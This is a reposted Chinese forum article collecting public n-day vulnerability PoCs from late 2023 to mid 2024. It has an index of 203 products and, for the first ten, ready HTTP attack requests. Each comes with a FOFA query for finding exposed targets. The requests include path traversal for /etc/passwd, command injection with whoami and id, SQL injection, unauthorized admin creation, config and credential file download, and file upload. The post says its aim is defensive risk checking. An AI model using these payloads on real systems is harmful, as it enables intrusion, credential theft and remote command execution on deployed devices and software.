找回密码
 立即注册
查看: 5688|回复: 0
打印 上一主题 下一主题

互联网公开漏洞整理202309-202406--转载

[复制链接]
跳转到指定楼层
楼主
发表于 2024-6-5 14:31:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
互联网公开漏洞整理202309-202406" i9 T- q" n, d1 |1 `
道一安全 2024-06-05 07:41 北京) @2 J% n1 J7 z; S+ K- T( ^) k; |
以下文章来源于网络安全新视界 ,作者网络安全新视界
3 z  z* a& o6 m% G$ `* ?9 W3 a8 W5 w6 z+ x% t; Z, V( Z' l( X1 x
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。# B& W% `/ o* e) y

& t# B6 f/ {* K漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
5 U% H, N0 ~4 B2 l7 Y7 ]* v
* i: k5 H1 `- P4 M1 N* b( G- |. ^安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。8 Q9 s4 u( R: j

  f  P' E+ G5 C. K# w; }文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
, o" M8 _. ?- t( e0 w! B2 Z6 i5 Y+ j5 ^) z
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。1 V: Y7 F) _# O
. Y5 S# M% _" _4 ?! `0 ~5 Z

9 J. B3 {8 M9 c" k( t声明7 T8 F- K: E9 E& ?

, z7 C1 t$ i! s' `! \3 R" Z为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! b5 B4 g. o& J( p$ g

! w) b4 e9 K' D. x1 n' y% ~# H' R0 G有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
9 T5 ]: T' t! E, K2 f  ]: P  C4 v! ]9 @4 |' B+ c
. o6 z' `4 Q! c- W8 h0 J: u2 I# Q
, `6 m6 M, M3 q- O: g  S
目录
0 l* H; K; W3 G" \" \! w( T' ?" b' l
01
  X0 x9 o: E* E
; s* H+ S/ @  s, z( r1. StarRocks MPP数据库未授权访问
. Q- E) r  q$ I1 C2. Casdoor系统static任意文件读取3 U7 Q; n9 |' v# \
3. EasyCVR智能边缘网关 userlist 信息泄漏
% r( z" f( V) U2 M, X4. EasyCVR视频管理平台存在任意用户添加1 T: P) i# w+ I" s& C# v
5. NUUO NVR 视频存储管理设备远程命令执行; ?( f. D3 }6 f) E* {5 l" P8 T4 y8 E1 V8 u
6. 深信服 NGAF 任意文件读取
' S0 u  s0 A8 H# j- Y& O7 S7. 鸿运主动安全监控云平台任意文件下载/ M. d; a& _) r: N: N
8. 斐讯 Phicomm 路由器RCE
* K! m" D) P0 ~% e3 {7 p9. 稻壳CMS keyword 未授权SQL注入) _; s5 @0 g6 I& @7 G! P# P0 R% D
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: w; R. G7 a% r* \; t; a8 {
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入" r4 |* L- {0 }6 }2 Q
12. Jorani < 1.0.2 远程命令执行
2 [9 \: O! o, N8 `13. 红帆iOffice ioFileDown任意文件读取$ R/ I* d  V8 e& @9 D' w
14. 华夏ERP(jshERP)敏感信息泄露' }3 V; {! m& ^1 b0 ~8 Q3 r
15. 华夏ERP getAllList信息泄露
3 n, J) u2 G5 g& d3 `7 o16. 红帆HFOffice医微云SQL注入
1 ^; |8 f; c! E8 T" e$ [17. 大华 DSS itcBulletin SQL 注入8 e+ n  V; j8 {  G3 I4 {7 U
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露- e# V! e7 B( t" T. q! t) p
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& p6 m3 N8 k, A& x0 Z7 S* f5 H( y20. 大华ICC智能物联综合管理平台任意文件读取2 C) V: Z3 H- @
21. 大华ICC智能物联综合管理平台random远程代码执行
4 j* @7 [  u6 {: k; Y+ \/ u22. 大华ICC智能物联综合管理平台 log4j远程代码执行  g' E& W: A# R+ ]' c7 y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ i; ]. Z+ E& b' s  ~+ F24. 用友NC 6.5 accept.jsp任意文件上传
! F5 T3 t3 i/ S+ Z25. 用友NC registerServlet JNDI 远程代码执行
0 N: p% @2 p; t) g/ K26. 用友NC linkVoucher SQL注入+ ^9 Z/ h" B/ v# e6 I6 D/ y
27. 用友 NC showcontent SQL注入
0 n/ h' X- b' E28. 用友NC grouptemplet 任意文件上传
% {' k1 y8 W: x$ M: p) j29. 用友NC down/bill SQL注入
6 r' _& \9 j3 l" [1 n30. 用友NC importPml SQL注入$ x9 `+ d$ K( i2 I: h; s
31. 用友NC runStateServlet SQL注入
! f  g; U: E& G0 Y* o, y5 {32. 用友NC complainbilldetail SQL注入
0 W0 S9 V) p0 P  ^33. 用友NC downTax/download SQL注入
; b0 d# Y# m' [; p2 l  x34. 用友NC warningDetailInfo接口SQL注入
+ t: s9 ~9 I5 q, a! R35. 用友NC-Cloud importhttpscer任意文件上传; Z+ ~5 p& x6 c: C4 x. K, G, h4 f
36. 用友NC-Cloud soapFormat XXE
3 Q# A# Z, b1 R7 X5 N3 |37. 用友NC-Cloud IUpdateService XXE" s1 s) b9 l; Y
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 L! m- u/ i9 u4 v" ~39. 用友U8 Cloud RegisterServlet SQL注入
; v8 Q: o* j7 T1 X8 k40. 用友U8-Cloud XChangeServlet XXE
1 t5 V" }' h+ V% A41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" ^/ W0 k3 u. h1 s, }: c42. 用友GRP-U8 SmartUpload01 文件上传2 R! E( o: o) p+ s! G. u* e
43. 用友GRP-U8 userInfoWeb SQL注入致RCE  Y* D7 Y, C- e. F3 ?4 e0 n
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
3 d: j8 R& n' m45. 用友GRP-U8 ufgovbank XXE
2 U1 @4 @5 B& C9 F% I  C46. 用友GRP-U8 sqcxIndex.jsp SQL注入" S; [1 V7 ]5 r, Q3 m  H. w
47. 用友GRP A++Cloud 政府财务云 任意文件读取4 F# Y7 _$ M' y( l3 V1 d& g
48. 用友U8 CRM swfupload 任意文件上传, }4 t4 P* d: u9 F( R: B
49. 用友U8 CRM系统uploadfile.php接口任意文件上传  ~5 c8 j7 M" W2 s$ d  P# U
50. QDocs Smart School 6.4.1 filterRecords SQL注入; F7 X' y, |* e7 A' j9 v
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
6 z$ ]8 `/ V5 t9 a5 m52. 泛微E-Office json_common.php sql注入
1 ^7 o3 L1 j* Q) d53. 迪普 DPTech VPN Service 任意文件上传$ h. K6 O. l/ N0 f
54. 畅捷通T+ getstorewarehousebystore 远程代码执行( J" C$ T& a8 r
55. 畅捷通T+ getdecallusers信息泄露: X1 ^3 g. J7 p6 H/ f
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
. m/ c  d+ k0 o0 O. S57. 畅捷通T+ keyEdit.aspx SQL注入' {7 \% b, _- F7 g' ]- G0 J
58. 畅捷通T+ KeyInfoList.aspx sql注入) Y( h1 s" X% h. I+ [
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
3 t" {+ G" c. O4 s, D( `% Y60. 百卓Smart管理平台 importexport.php SQL注入6 W! E* I$ E; G5 [
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' L$ P6 I. S* a
62. IP-guard WebServer 远程命令执行  J$ A: j$ p" ]
63. IP-guard WebServer任意文件读取
6 p- _( T* |/ w) ^64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 i. F/ L: p% ?8 A& I( c3 t. Z$ Y9 }) F65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ d( Z6 O7 P7 Y; ^% E/ z
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
' d+ F! m) ]" A' j$ }67. 万户ezOFFICE wpsservlet任意文件上传  n5 f/ |' h) s# \
68. 万户ezOFFICE wf_printnum.jsp SQL注入0 F* M$ C* D1 i6 |
69. 万户 ezOFFICE contract_gd.jsp SQL注入
; Z/ L5 U+ A7 A8 P( }70. 万户ezEIP success 命令执行
0 s( ~! T( F" U" P% e2 n71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; B0 ^+ C; A$ m% j
72. 致远OA getAjaxDataServlet XXE1 `8 h3 O' g& ], q$ M2 X
73. GeoServer wms远程代码执行
5 D' E" {- V/ X5 c9 b74. 致远M3-server 6_1sp1 反序列化RCE
& M/ |# K$ U) l- @- R75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 b; y$ j- n4 d( R& u
76. 新开普掌上校园服务管理平台service.action远程命令执行4 e, W$ P3 l3 u) o' O9 X
77. F22服装管理软件系统UploadHandler.ashx任意文件上传! P& |9 E: l) n- W9 {* i
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; o2 H) T& A! A: j7 `1 [
79. BYTEVALUE 百为流控路由器远程命令执行
( D* p8 ]; y5 z0 [  l, F80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
+ |8 T; X5 ]) M81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% j  \! h% P# Y# k7 w" w) [5 l6 s/ ~82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
. Q- L5 H8 S) ~. T( C# w8 M83. JeecgBoot testConnection 远程命令执行5 u% E  R# U: h5 Y1 I( K
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# T; z# n8 H' y$ e9 z! v
85. SysAid On-premise< 23.3.36远程代码执行
+ `& a. y# R  _! c- ~5 Q' p+ Y7 `86. 日本tosei自助洗衣机RCE
6 }9 d) [0 p4 A  t87. 安恒明御安全网关aaa_local_web_preview文件上传
+ L; b' _& u" s/ S% v8 s88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 P5 P# c1 t& @: D7 u9 k! V3 B/ J89. 致远互联FE协作办公平台editflow_manager存在sql注入
* D4 ]% d  p& t, M( J+ c90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行: Q" P7 I# ]- y8 D8 b6 \- V3 s# v' t+ i
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取7 I& w+ M) E* B! K' q: y
92. 海康威视运行管理中心session命令执行
+ q- _7 a3 ]2 h. Z7 |* ^! X$ |93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. N4 p& Q; d; a5 ?9 L
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
& W' M# L! T" d* L& R( y/ U- ?, i95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
( B7 E$ t5 w- a# l5 n$ ^" X96. Apache OFBiz  18.12.11 groovy 远程代码执行% n/ T$ U/ T, i/ F* {9 t
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
' B) \/ a* F8 x98. SpiderFlow爬虫平台远程命令执行
. G: ^: H, d) X( d5 E! s/ b0 u  H99. Ncast盈可视高清智能录播系统busiFacade RCE' E+ N$ _, h# s7 J, U0 S5 H
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 z( L" U7 f& h! h& p) V+ T101. ivanti policy secure-22.6命令注入
/ N7 j3 d! [# f. t6 Z; k102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行6 L1 l  w" C, E) Q4 v# U
103. Ivanti Pulse Connect Secure VPN XXE# s# k$ `7 b9 `+ O! z
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露* H* b: Z/ b) B- c! \; s6 O
105. SpringBlade v3.2.0 export-user SQL 注入
8 e/ w6 _, H: K# _106. SpringBlade dict-biz/list SQL 注入
! M* L, t" h# \+ S% d: Y4 ?107. SpringBlade tenant/list SQL 注入
6 x4 T# y  ^7 A/ i$ x  W108. D-Tale 3.9.0 SSRF3 d, r8 _9 a4 _% b  W+ {
109. Jenkins CLI 任意文件读取5 u, y, p) `% u$ Z6 c
110. Goanywhere MFT 未授权创建管理员" H. \. A2 q2 y3 T3 X; r& K2 E; T
111. WordPress Plugin HTML5 Video Player SQL注入
4 v) u7 j+ p% B9 d9 g- f112. WordPress Plugin NotificationX SQL 注入3 G! s4 s1 c; w
113. WordPress Automatic 插件任意文件下载和SSRF
" C* q4 M1 x- M' ^+ t114. WordPress MasterStudy LMS插件 SQL注入/ F7 N. `3 V, T
115. WordPress Bricks Builder <= 1.9.6 RCE
; d5 O: m6 w4 m6 s0 z116. wordpress js-support-ticket文件上传
- K# V1 C6 q' O- o117. WordPress LayerSlider插件SQL注入/ o' [" ?- r- g) d$ f- N$ E
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' `. e5 R, Z0 B- p$ w
119. 北京百绰智能S20后台sysmanageajax.php sql注入
0 R( l8 ~1 p: O9 o" K$ S  s120. 北京百绰智能S40管理平台导入web.php任意文件上传
# P) Z8 M( q" Y" F( g121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# W# R0 g8 F; v; @122. 北京百绰智能s200管理平台/importexport.php sql注入
- v, c+ K; ^( |8 N( l& z123. Atlassian Confluence 模板注入代码执行
% z% \# j0 L" \5 L, F5 X. a124. 湖南建研工程质量检测系统任意文件上传
' R$ a% W0 p3 D/ J- N125. ConnectWise ScreenConnect身份验证绕过
2 H0 x; c( T4 g$ D- B* \( ?126. Aiohttp 路径遍历
( \" J5 C1 {: l3 F$ s127. 广联达Linkworks DataExchange.ashx XXE
0 g* Y- H3 ^$ D; X; E) ?. l' K128. Adobe ColdFusion 反序列化
6 q4 {- |0 M) k6 `1 {: m129. Adobe ColdFusion 任意文件读取
1 b& q* x# h: O1 k! f9 y3 k+ z130. Laykefu客服系统任意文件上传
$ a. r3 |0 M: D6 w7 }1 P131. Mini-Tmall <=20231017 SQL注入1 @8 @1 M5 T, J6 M& E) k2 q
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
6 C# @" o% }: a0 G133. H5 云商城 file.php 文件上传9 v, C0 @8 l) c) G
134. 网康NS-ASG应用安全网关index.php sql注入
5 b/ o4 P- C8 j$ o135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入3 {7 p  u  V- n; R, N! a$ Q9 Q5 z
136. NextChat cors SSRF* y; K: ~# ^2 Q2 {5 W9 ^
137. 福建科立迅通信指挥调度平台down_file.php sql注入
8 b/ G* {& f1 |% U138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
. r' y. X3 K. `/ Y. N2 K139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ }% V' p* e$ B2 r; o* r" {9 ]: g
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- W) ~( L0 Y0 Z( y6 `+ ]
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" G# z& I% h& I7 F/ w; Z
142. CMSV6车辆监控平台系统中存在弱密码6 C! O1 ]. k6 \+ G
143. Netis WF2780 v2.1.40144 远程命令执行' ^# y" a2 p- R
144. D-Link nas_sharing.cgi 命令注入: p" W& Y# }9 G* d7 t6 z  b
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入1 D: K" `% C  x3 [' ^
146. MajorDoMo thumb.php 未授权远程代码执行, F- ]( \  H2 M6 _2 n- `
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
6 V2 |( _5 y) |7 ^" M1 U! `148. CrushFTP 认证绕过模板注入) p( Y+ R* J$ Q' x, j
149. AJ-Report开源数据大屏存在远程命令执行
! ^6 `: @7 L4 G9 z4 M; u150. AJ-Report 1.4.0 认证绕过与远程代码执行
) i5 I/ I, T# x* b% P% V8 u151. AJ-Report 1.4.1 pageList sql注入
$ ~6 _) Q  t9 A1 N# W; k* Z  ^152. Progress Kemp LoadMaster 远程命令执行
- M# L: W7 v& f, ?$ X0 ]153. gradio任意文件读取. d. V, T: n$ n  W) ]4 l+ Q: [
154. 天维尔消防救援作战调度平台 SQL注入# Z# a: D$ x- o( a' Y% p% l
155. 六零导航页 file.php 任意文件上传
3 n" [  t6 ^3 x  C156. TBK DVR-4104/DVR-4216 操作系统命令注入; n- K0 A# W9 q
157. 美特CRM upload.jsp 任意文件上传
: h8 t+ w, g4 v% }6 j158. Mura-CMS-processAsyncObject存在SQL注入; l2 F% [" r1 b5 T8 `
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传; A6 Q  {2 `7 s2 w3 h+ @. B
160. Sonatype Nexus Repository 3目录遍历与文件读取
% I) E- s( p# w, I; U9 O, j- o8 _161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
* Q" X3 W5 c8 }4 q0 V" {2 e162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 J& e& Q# ]) w- o# n/ [. O
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传: M& t9 z1 [! @1 E8 A! K0 n3 m
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- l3 u" g% d2 L' V7 i7 e' A0 d9 T165. OrangeHRM 3.3.3 SQL 注入
  j& |) T: B5 }% p$ W8 c166. 中成科信票务管理平台SeatMapHandler SQL注入
1 K& o. G& M/ ~) g1 P; d$ ~0 D167. 精益价值管理系统 DownLoad.aspx任意文件读取  }+ Y0 R( H7 ]7 k. {
168. 宏景EHR OutputCode 任意文件读取
% y7 C& s$ V6 A169. 宏景EHR downlawbase SQL注入
8 q0 k) c' b, [$ p* z. T7 q0 ]$ `170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ h0 [6 p! G& T5 v' c
171. 通天星CMSV6车载定位监控平台 SQL注入  [: |% G& O2 c$ J
172. DT-高清车牌识别摄像机任意文件读取
! {" X5 r' M7 Z, p6 x1 Q& e( I3 W$ q173. Check Point 安全网关任意文件读取
; ^8 A5 [# a0 X) }174. 金和OA C6 FileDownLoad.aspx 任意文件读取
- C, @" X. c, k$ d175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; L' K0 U! x" T( V7 ~7 n0 @( a176. 电信网关配置管理系统 rewrite.php 文件上传
1 L* T( Y0 c2 \  G/ I177. H3C路由器敏感信息泄露
2 G& g) d* \% f+ @* B/ |178. H3C校园网自助服务系统-flexfileupload-任意文件上传
) G0 o2 r2 z, i1 c' ~' H: q179. 建文工程管理系统存在任意文件读取
0 }: V# I9 {; K5 E; L4 R6 D180. 帮管客 CRM jiliyu SQL注入$ c% Q8 l; H! l; E
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入3 V8 r8 F+ q: X
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- ?) e- \; E; q  B$ P' B( p( c1 j) y
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 t# h( u% H$ n+ l" u& H0 H
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& I7 C5 |$ q/ b# s185. 瑞友天翼应用虚拟化系统SQL注入6 C/ V* |  y/ j) s( Z
186. F-logic DataCube3 SQL注入/ o: l% N' ?: K1 S1 A/ D0 Z3 x8 ?  p% Q
187. Mura CMS processAsyncObject SQL注入) U" i5 D9 Y. x9 @( O
188. 叁体-佳会视频会议 attachment 任意文件读取
8 @  J/ e$ q9 W189. 蓝网科技临床浏览系统 deleteStudy SQL注入
9 O! G( p, n  j2 t190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ I; Q  {+ C9 R# \; B+ r5 J191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入  ~' M( i2 I/ B% o
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传3 H: S5 L* N0 w% E3 v7 I( ?
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行* l7 i+ b  ?3 }: S4 {
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传# m5 }6 B$ ~, v- C, ?* B
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行- d9 M( L* M0 ]: ^
196. 河南省风速科技统一认证平台密码重置
4 w4 p7 ]) E0 |/ t+ O$ H" H! H/ Y197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
0 e" @1 g9 J9 L1 h0 {198.  阿里云盘 WebDAV 命令注入
$ ~# @( L2 P! |+ n, S$ P- }1 q1 q199. cockpit系统assetsmanager_upload接口 文件上传
8 v# r; M: @+ ?% w4 b  k- ?200. SeaCMS海洋影视管理系统dmku SQL注入
, C, B+ B" @) H8 l1 v0 f" L- H201. 方正全媒体新闻采编系统 binary SQL注入
. S+ i5 ]" k5 y1 @" z' b. p( G" n202. 微擎系统 AccountEdit任意文件上传
+ R0 N0 i: T/ P4 m6 _: h. b2 ~5 w203. 红海云EHR PtFjk 文件上传
5 C/ N! K$ f  Z7 w3 P4 ^/ v
: w! [: P5 w( @- w0 e% vPOC列表
) y: U- u# H+ R
" ^' m0 c& t+ D% s" F02" I' _7 y! x3 B  ]  r% W  r
, p! j) |$ h3 a) N3 Y1 }
1. StarRocks MPP数据库未授权访问: h2 f0 o& v+ ^* ^% @
FOFA :title="StarRocks"0 O5 ?2 [/ E9 ~3 ]/ g/ {1 _/ T
GET /mem_tracker HTTP/1.1
8 l0 Q1 J2 U0 f; {: O" H9 ^% BHost: URL
' g; _3 U1 }) v5 ]/ e, _, _; G+ r: n% m- _
. A, W( R8 Y% K; Q7 t( C
2. Casdoor系统static任意文件读取
5 G3 F/ Y4 u( ~' m3 n0 S! LFOFA :title="Casdoor"
0 Z0 {! B/ M! e. r% UGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
3 E1 l* _  C6 gHost: xx.xx.xx.xx:9999+ h+ b; A3 _. F5 k  M1 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ ~4 z6 }4 K) y1 dConnection: close
) S/ M0 ?( d4 f& P6 R) n' Z- tAccept: */*
9 T; l0 J( M" j/ e! ~- Z' K) `& _1 iAccept-Language: en
5 L. e- u3 Z# Y; M/ LAccept-Encoding: gzip  J# f6 T* \) J9 t0 t. A
* Z/ V4 b% d5 C+ p( r. b0 o

( ~- n& k, a5 n- O1 m2 G3. EasyCVR智能边缘网关 userlist 信息泄漏
# C9 W6 s' k8 p; I: sFOFA :title="EasyCVR"2 B& L  T* i! Y1 B
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1. Y$ Q( U0 I+ p! B
Host: xx.xx.xx.xx% F9 g+ q& Y& Z! I
7 s' ^5 @6 N4 w9 v( N7 S

6 n; l8 d% q% p; J4. EasyCVR视频管理平台存在任意用户添加
4 \1 H* B; ~" e6 e6 P6 c8 rFOFA :title="EasyCVR"
" ?" b! q& C0 d% v' a  C7 q7 [% A7 `) c9 o7 t" `5 h! [  |
password更改为自己的密码md5# H# q4 U* g0 B5 e+ c" }
POST /api/v1/adduser HTTP/1.1. t7 l9 ?  i, n9 ~# v, i
Host: your-ip
! b0 \3 N$ A6 d4 L8 `% kContent-Type: application/x-www-form-urlencoded; charset=UTF-8
- q+ ~& ]3 \; s8 F# {0 h
. D: v3 O/ J* ]0 d0 m2 T1 c) e- Lname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
$ Q' B" C0 v9 X! ~
  x7 U% V) R( F2 ^6 O# I/ b: |$ w1 l: a4 S
5. NUUO NVR 视频存储管理设备远程命令执行' `( q. E# _# J
FOFA:title="Network Video Recorder Login"4 v3 `: k3 o: r( A7 _" E( P9 f
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
; l0 E" e0 P* H& W4 n/ LHost: xx.xx.xx.xx
, u. x  F4 c8 e* C  N4 z
0 a* c) N, X6 s: k2 y0 D. m3 N1 N- J: R5 J4 g( w
6. 深信服 NGAF 任意文件读取
; e8 Q' D7 ~$ r+ E) z4 zFOFA:title="SANGFOR | NGAF"$ H2 a: q3 L  Q0 @7 t( G, Z. ]
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
6 c4 V' H- N' N7 ^- s' \/ n2 u, u' gHost:4 O. }' u- r6 g  V' a' j% P* B
* S- ~- X/ {. R) [( k- ^9 o
5 r& d% O: {! G0 s3 t
7. 鸿运主动安全监控云平台任意文件下载
3 W' ~& T1 z2 _* cFOFA:body="./open/webApi.html"  E" Q9 l4 s# u: o
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
3 s/ t1 E5 s8 \Host:
0 f. G$ A5 I" h2 c: P6 y6 G; r
3 O) L8 u5 }3 q8 E/ s6 I# Y, m  D& U% V3 Q
8. 斐讯 Phicomm 路由器RCE: ~/ D7 A- \7 t; ], [# {& _& W. J
FOFA:icon_hash="-1344736688"
- R& Y1 P( s: ?' l默认账号admin登录后台后,执行操作$ V( z# P7 O9 p
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
' k# X4 p6 }" |7 Z7 V- l: F  ^Host: x.x.x.x
) j  Z/ O6 ^/ R: ]/ w' yCookie: sysauth=第一步登录获取的cookie" M2 ]8 h4 U! S% a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
: P3 k$ G' i# E% B- ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36# h9 {1 T: E5 V5 X- h

% R: `& @# R4 @------WebKitFormBoundaryxbgjoytz9 H' Z- U% M* a) {  @
Content-Disposition: form-data; name="wifiRebootEnablestatus"
8 ~' E9 W, l" F4 v  t" J! J4 E/ Q" @% O3 @; v& S5 I
%s
0 s& N% y/ z& }$ R) j# Q& e------WebKitFormBoundaryxbgjoytz
4 F5 i# g/ G; R9 q& j1 pContent-Disposition: form-data; name="wifiRebootrange"9 A. p  ^  i2 ~( Y7 Y) [+ t8 C
! ^* Z; C8 D# m6 _
12:00; id;
1 z# d' N8 ~  y6 L4 J------WebKitFormBoundaryxbgjoytz
' h  f2 ]* A8 \5 Z6 h, ~8 YContent-Disposition: form-data; name="wifiRebootendrange"
( h" H8 q; f7 o0 b; w) m  \
3 X/ Y- {- q' z: e8 r%s:
: P5 F/ X" Y" T$ c! }, C------WebKitFormBoundaryxbgjoytz' M4 e, w- O1 v) j" x- F
Content-Disposition: form-data; name="cururl2": v' g4 t8 w/ K1 `" j3 }1 o" V! D
% O6 @$ J( N3 h6 j
. N: J( s  ~6 J" e' @
------WebKitFormBoundaryxbgjoytz--) _9 _) ?7 H6 o6 L4 r
1 g. y& P1 {; \2 r
, E, ?+ t7 ~1 H
9. 稻壳CMS keyword 未授权SQL注入
7 g0 ?4 R. Q, L, r- w( t+ L% cFOFA:app="Doccms"
* h# n* c0 b1 r" w3 F  uGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.19 c2 ?2 x" h8 a2 d5 W+ e
Host: x.x.x.x2 e( ?. T+ B* j2 ]

" ^+ i+ B$ q7 Y8 c
' `3 v# X$ x" g( ]payload为下列语句的二次Url编码
) _. a( s( y1 J$ i) d8 v1 q
4 }& C/ n: b5 T1 L) D' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
: L# X: o" |& O' J) g- V
8 M& `. P, R, x2 x6 A10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ `0 b2 r1 }1 c2 _# T/ v
FOFA:icon_hash="953405444"
& ~. w1 x, o5 w; R" O8 V3 v6 {6 [3 L& ~# q" @
文件上传后响应中包含上传文件的路径, g+ ?* s/ `- L# S0 y3 T. T) k( W0 B4 B
POST /eis/service/api.aspx?action=saveImg HTTP/1.1- V: j) D8 s$ `; `' G4 u
Host: x.x.x.x:xx
; L$ m$ K- b+ b; r0 o( vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, K( I# [6 b% e( A  ~
Content-Length: 197
) [- E+ d' m) }3 J) ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 H$ G& z& ^+ J# b% ]2 H5 I
Accept-Encoding: gzip, deflate
/ V0 M7 }# s! [Accept-Language: zh-CN,zh;q=0.9
; ^8 T7 I; y3 O6 FConnection: close3 A, s" K# {9 i, L1 @5 J3 ^/ S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu$ v4 K! `5 }, r
/ y! z+ `# m, R$ k' ]2 Y
------WebKitFormBoundaryxdgaqmqu
  x( E" L: f; A; zContent-Disposition: form-data; name="file"filename="icfitnya.txt"
' \, r& k  C; ~% D' [! i6 ?Content-Type: text/html
1 B% Z) f2 n% e3 U( v0 ^0 c9 ^
) R  V9 E% B) X5 Z2 Jjmnqjfdsupxgfidopeixbgsxbf. j% }6 k- m2 w( K
